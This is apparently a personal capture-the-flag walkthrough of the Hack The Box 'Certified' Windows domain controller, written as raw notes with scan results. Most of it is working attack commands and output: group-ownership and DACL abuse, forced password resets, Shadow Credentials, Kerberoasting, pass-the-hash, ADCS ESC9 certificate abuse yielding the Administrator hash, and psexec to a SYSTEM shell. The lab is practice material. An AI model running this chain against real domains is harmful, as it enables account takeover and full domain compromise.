Here is my note on CERTIFIED box from Hackthebox.
CERTIFIED: 10.129.119.214
#As is common in Windows pentests, you will start the Certified box with credentials for the following account: Username: judith.mader Password: judith09
judith.mader:judith09
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
bloodhound-python -c All -u judith.mader -p 'judith09' -d certified.htb --dns-tcp -ns 10.129.228.192
BLOODHOUND DATA:
Judith.Mader -> WriteOwner -> Management@CERTIFIED.HTB Group:
python3 owneredit.py -action read -target 'Management' 'certified.htb'/'judith.mader':'judith09'
python3 owneredit.py -action write -new-owner 'judith.mader' -target 'Management' 'certified.htb'/'judith.mader':'judith09'
python3 owneredit.py -action read -target 'Management' 'certified.htb'/'judith.mader':'judith09'
python3 dacledit.py -action 'write' -rights 'FullControl' -principal judith.mader -target 'Management' 'certified.htb'/'judith.mader':'judith09'
net rpc group addmem "Management" "judith.mader" -U 'certified.htb'/'judith.mader':'judith09' -S 10.129.228.192
net rpc group members "Management" -U 'certified.htb'/'judith.mader':'judith09' -S 10.129.228.192
┌──(root㉿kali)-[/home/…/Kali-Tools/attacktive-directory-tools/impacket/examples]
└─# net rpc group members "Management" -U 'certified.htb'/'judith.mader' -S 10.129.228.192
Password for [CERTIFIED.HTB\judith.mader]:
CERTIFIED\judith.mader
CERTIFIED\management_svc
Now judith.mader have the same privilege permission as management_svc which it hash is uncrackable due both of these two users are in the same group.
Management Group -> GenericWrite -> management_svc user > CanPSRemote -> DC01.CERTIFIED.HTB:
net rpc password 'management_svc' Password123 -U certified.htb/judith.mader%judith09 -S dc01.certified.htb
net rpc password "management_svc" "Password12345" -U "certified.htb"/"judith.mader"%'judith09' -S "10.129.228.192"
certipy find -vulnerable -stdout -u judith.mader@certified.htb -p judith09 -dc-ip 10.129.228.192
GenericWrite Shardow Credentials with PyWhisker and Certipy:
BloodHound DATA:
judith.mader user -> Member of Management Group -> GenericWrite -> management_svc user -> CanPSRemote -> DC01.CERTIFIED.HTB:
python3 pywhisker.py -d "certified.htb" -u "judith.mader" -p "judith09" --target "management_svc" --action "add"
certipy cert -export -pfx QVi50QwS.pfx -password "vErXoK0pJE1Emln8xoXE" -out unprotected_pfx.pfx
certipy auth -pfx unprotected_pfx.pfx -username "management_svc" -domain "certified.htb"
┌──(root㉿kali)-[/home/kali/Kali-Tools/attacktive-directory-tools/pywhisker]
└─# timedatectl set-ntp off
┌──(root㉿kali)-[/home/kali/Kali-Tools/attacktive-directory-tools/pywhisker]
└─# sudo rdate -n 10.129.228.192
Sat Nov 30 20:59:46 EST 2024
┌──(root㉿kali)-[/home/kali/Kali-Tools/attacktive-directory-tools/pywhisker]
└─# certipy auth -pfx unprotected_pfx.pfx -username "management_svc" -domain "certified.htb"
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[!] Could not find identification in the provided certificate
[*] Using principal: management_svc@certified.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'management_svc.ccache'
[*] Trying to retrieve NT hash for 'management_svc'
[*] Got hash for 'management_svc@certified.htb': aad3b435b51404eeaad3b435b51404ee:a091c1832bcdd4677c28b5a6a1295584
#Keep doing timedatectl and rdate over and over until this command extract the hash of management_svc. (KRB_AP_ERR_SKEW_TOO_GREAT Troubleshooting).
crackmapexec winrm 10.129.228.192 -u management_svc -H a091c1832bcdd4677c28b5a6a1295584
SMB 10.129.228.192 5985 DC01 [*] Windows 10.0 Build 17763 (name:DC01) (domain:certified.htb)
HTTP 10.129.228.192 5985 DC01 [*] http://10.129.228.192:5985/wsman
WINRM 10.129.228.192 5985 DC01 [+] certified.htb\management_svc:a091c1832bcdd4677c28b5a6a1295584 (Pwn3d!)
https://i-tracing.com/blog/shadow-credentials/
management_svc user -> GenericAll -> ca_operator user:
pth-net rpc password "ca_operator" "Password123" -U "certified.htb"/"management_svc"%"aad3b435b51404eeaad3b435b51404ee":"a091c1832bcdd4677c28b5a6a1295584" -S "dc01.certified.htb"
┌──(root㉿kali)-[/home/…/Kali-Tools/attacktive-directory-tools/impacket/examples]
└─# pth-net rpc password "ca_operator" "Password123" -U "certified.htb"/"management_svc"%"aad3b435b51404eeaad3b435b51404ee":"a091c1832bcdd4677c28b5a6a1295584" -S "dc01.certified.htb"
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...
┌──(root㉿kali)-[/home/…/Kali-Tools/attacktive-directory-tools/impacket/examples]
└─# crackmapexec smb 10.129.228.192 -u ca_operator -p Password123
SMB 10.129.228.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB 10.129.228.192 445 DC01 [+] certified.htb\ca_operator:Password123
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-29 23:26:10Z)
Clock Skew too great troubleshooting:
timedatectl set-ntp off
sudo rdate -n [RHOST]
┌──(root㉿kali)-[/home/kali/HTB/CERTIFIED]
└─# GetUserSPNs.py -request -dc-ip 10.129.228.192 certified.htb/judith.mader:judith09
Impacket v0.11.0 - Copyright 2023 Fortra
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
--------------------------------- -------------- ------------------------------------------ -------------------------- --------- ----------
certified.htb/management_svc.DC01 management_svc CN=Management,CN=Users,DC=certified,DC=htb 2024-05-13 11:30:51.476756 <never>
[-] CCache file is not found. Skipping...
[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
┌──(root㉿kali)-[/home/kali/HTB/CERTIFIED]
└─# timedatectl set-ntp off
┌──(root㉿kali)-[/home/kali/HTB/CERTIFIED]
└─# sudo rdate -n 10.129.228.192
Sat Nov 30 19:18:34 EST 2024
┌──(root㉿kali)-[/home/kali/HTB/CERTIFIED]
└─# GetUserSPNs.py -request -dc-ip 10.129.228.192 certified.htb/judith.mader:judith09
Impacket v0.11.0 - Copyright 2023 Fortra
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
--------------------------------- -------------- ------------------------------------------ -------------------------- --------- ----------
certified.htb/management_svc.DC01 management_svc CN=Management,CN=Users,DC=certified,DC=htb 2024-05-13 11:30:51.476756 <never>
[-] CCache file is not found. Skipping...
$krb5tgs$23$*management_svc$CERTIFIED.HTB$certified.htb/management_svc*$8f8284560fe81b5[SNIP]
https://scribe.rip/@danieldantebarnes/fixing-the-kerberos-sessionerror-krb-ap-err-skew-clock-skew-too-great-issue-while-kerberoasting-b60b0fe20069
management_svc - Uncrackable Hash = NOPE !
#NO ASREPROASTING.
135/tcp open msrpc Microsoft Windows RPC
┌──(root㉿kali)-[/home/kali/VULNLAB]
└─# rpcclient --user="judith.mader%judith09" --command=enumdomusers -N 10.129.228.192
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
┌──(root㉿kali)-[/home/kali/VULNLAB]
└─# rpcclient --user="judith.mader" --command=enumdomusers -N 10.129.228.192
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
ldapsearch -H ldap://10.129.228.192 -x -W -D "judith.mader@certified.htb" -b "dc=certified,dc=htb" '(objectClass=person)'
ldapsearch -H ldap://10.129.228.192 -x -W -D "judith.mader@certified.htb" -b "dc=certified,dc=htb" '(objectClass=person)' > ldap-people
No interesting description and password disclosure.
445/tcp open microsoft-ds?
#No intersting shares.
#No SYSVOL gpp scripts and interesting xml files.
sudo lookupsid.py judith.mader@10.129.228.192 | tee usernames
grep SidTypeUser usernames | awk '{print $2}' | cut -d "\\" -f2 > users.txt
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
#FROM BLOODHOUND ATTACK: Management GROUP -> GenericWrite -> management_svc user
crackmapexec winrm 10.129.228.192 -u management_svc -H a091c1832bcdd4677c28b5a6a1295584
SMB 10.129.228.192 5985 DC01 [*] Windows 10.0 Build 17763 (name:DC01) (domain:certified.htb)
HTTP 10.129.228.192 5985 DC01 [*] http://10.129.228.192:5985/wsman
WINRM 10.129.228.192 5985 DC01 [+] certified.htb\management_svc:a091c1832bcdd4677c28b5a6a1295584 (Pwn3d!)
evil-winrm -i 10.129.228.192 -u management_svc -H a091c1832bcdd4677c28b5a6a1295584
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\management_svc\Documents> whoami
certified\management_svc
*Evil-WinRM* PS C:\Users\management_svc\Documents> hostname
DC01
USER-SHELL !
*Evil-WinRM* PS C:\Users\management_svc\Desktop> whoami
certified\management_svc
*Evil-WinRM* PS C:\Users\management_svc\Desktop> hostname
DC01
*Evil-WinRM* PS C:\Users\management_svc\Desktop> dir
Directory: C:\Users\management_svc\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 11/30/2024 3:32 PM 34 user.txt
*Evil-WinRM* PS C:\Users\management_svc\Desktop> type user.txt
[REDIRECTED]
USER.TXT: [REDIRECTED]
PRIV ESC:
#FROM BLOODHOUND ATTACK: management_svc -> GenericAll -> ca_operator
┌──(root㉿kali)-[/home/…/Kali-Tools/attacktive-directory-tools/impacket/examples]
└─# pth-net rpc password "ca_operator" "Password123" -U "certified.htb"/"management_svc"%"aad3b435b51404eeaad3b435b51404ee":"a091c1832bcdd4677c28b5a6a1295584" -S "dc01.certified.htb"
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...
┌──(root㉿kali)-[/home/…/Kali-Tools/attacktive-directory-tools/impacket/examples]
└─# crackmapexec smb 10.129.228.192 -u ca_operator -p Password123
SMB 10.129.228.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB 10.129.228.192 445 DC01 [+] certified.htb\ca_operator:Password123
ESC9:
#FROM BLOODHOUND ATTACK: management_svc -> GenericAll -> ca_operator
┌──(root㉿kali)-[/home/…/Kali-Tools/attacktive-directory-tools/impacket/examples]
└─# pth-net rpc password "ca_operator" "Password123" -U "certified.htb"/"management_svc"%"aad3b435b51404eeaad3b435b51404ee":"a091c1832bcdd4677c28b5a6a1295584" -S "dc01.certified.htb"
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...
┌──(root㉿kali)-[/home/…/Kali-Tools/attacktive-directory-tools/impacket/examples]
└─# crackmapexec smb 10.129.228.192 -u ca_operator -p Password123
SMB 10.129.228.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB 10.129.228.192 445 DC01 [+] certified.htb\ca_operator:Password123
certipy find -vulnerable -stdout -u ca_operator@certified.htb -p Password123 -dc-ip 10.129.228.192
[*] Enumeration output:
Certificate Authorities
0
CA Name : certified-DC01-CA
DNS Name : DC01.certified.htb
Certificate Subject : CN=certified-DC01-CA, DC=certified, DC=htb
[SNIP]
Certificate Templates
0
Template Name : CertifiedAuthentication
Display Name : Certified Authentication
Certificate Authorities : certified-DC01-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : False
[SNIP]
[!] Vulnerabilities
ESC9 : 'CERTIFIED.HTB\\operator ca' can enroll and template has no security extension
certipy req -username ca_operator@certified.htb -p Password123 -ca certified-DC01-CA -template CertifiedAuthentication -upn Administrator@certified.htb
certipy auth -pfx ca_operator.pfx -domain certified.htb
certipy auth -pfx ca_operator.pfx -domain certified.htb
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Using principal: ca_operator@certified.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ca_operator.ccache'
[*] Trying to retrieve NT hash for 'ca_operator'
[*] Got hash for 'ca_operator@certified.htb': aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71
certipy account update -username management_svc@certified.htb -hashes a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn Administrator
certipy req -username ca_operator@certified.htb -hashes 58a478135a93ac3bf058a5ea0e8fdb71 -ca certified-DC01-CA -template CertifiedAuthentication -upn Administrator@certified.htb
certipy account update -username management_svc@certified.htb -hashes a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn ca_operator@certified.htb
certipy auth -pfx administrator.pfx -domain certified.htb
┌──(root㉿kali)-[/home/…/Kali-Tools/attacktive-directory-tools/impacket/examples]
└─# timedatectl set-ntp off
┌──(root㉿kali)-[/home/…/Kali-Tools/attacktive-directory-tools/impacket/examples]
└─# sudo rdate -n 10.129.228.192
Sat Nov 30 21:42:00 EST 2024
┌──(root㉿kali)-[/home/…/Kali-Tools/attacktive-directory-tools/impacket/examples]
└─# certipy auth -pfx administrator.pfx -domain certified.htb
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@certified.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@certified.htb': aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34
┌──(root㉿kali)-[/home/…/Kali-Tools/attacktive-directory-tools/impacket/examples]
└─# crackmapexec smb 10.129.228.192 -u administrator -H 0d5b49608bbce1751f708748f67e2d34
SMB 10.129.228.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB 10.129.228.192 445 DC01 [+] certified.htb\administrator:0d5b49608bbce1751f708748f67e2d34 (Pwn3d!)
https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation#id-5485
https://www.thehacker.recipes/ad/movement/adcs/certificate-templates#esc9-no-security-extension
sudo rlwrap psexec.py -hashes :0d5b49608bbce1751f708748f67e2d34 administrator@certified.htb
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Requesting shares on certified.htb.....
[*] Found writable share ADMIN$
[*] Uploading file TNjguwcr.exe
[*] Opening SVCManager on certified.htb.....
[*] Creating service apsI on certified.htb.....
[*] Starting service apsI.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.6414]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> hostname
DC01
SYSTEM-SHELL !
C:\Users\Administrator\Desktop> whoami
nt authority\system
C:\Users\Administrator\Desktop> hostname
DC01
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is EA74-A0A7
Directory of C:\Users\Administrator\Desktop
10/22/2024 12:15 PM <DIR> .
10/22/2024 12:15 PM <DIR> ..
11/30/2024 03:32 PM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 5,229,105,152 bytes free
C:\Users\Administrator\Desktop> type root.txt
[REDIRECTED]
ROOT.TXT: [REDIRECTED]
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49689/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49690/tcp open msrpc Microsoft Windows RPC
49695/tcp open msrpc Microsoft Windows RPC
49724/tcp open msrpc Microsoft Windows RPC
49745/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
PORT STATE SERVICE
53/udp open domain
123/udp open ntp